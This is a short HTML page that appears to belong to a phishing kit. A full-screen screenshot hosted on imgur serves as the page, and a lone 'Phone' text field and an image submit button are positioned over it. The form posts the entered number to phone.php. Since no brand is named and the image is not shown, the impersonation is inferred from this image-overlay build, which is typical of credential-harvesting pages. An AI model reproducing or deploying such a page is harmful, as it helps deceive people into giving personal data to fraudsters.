<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Document</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="generator" content="Web Page Maker">
</head>
<body>
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1365px; height:651px; z-index:0"><img src="https://i.imgur.com/VcJLrCD.jpg" alt="" title="" border=0 width=1365 height=651></div>

<form name="form1" method="POST" action="phone.php" enctype="application/x-www-form-urlencoded" style="margin:0px">
<input name="formtext1" type="text" style="position:absolute;width:372px;left:499px;top:343px;z-index:2;height: 43px;" placeholder="Phone">
<div id="formimage1" style="position:absolute; left:769px; top:422px; z-index:3"><input type="image" name="formimage1" width="108" height="54" src="https://i.imgur.com/uzeEB47.png"></div>
</form>


</body>
</html>
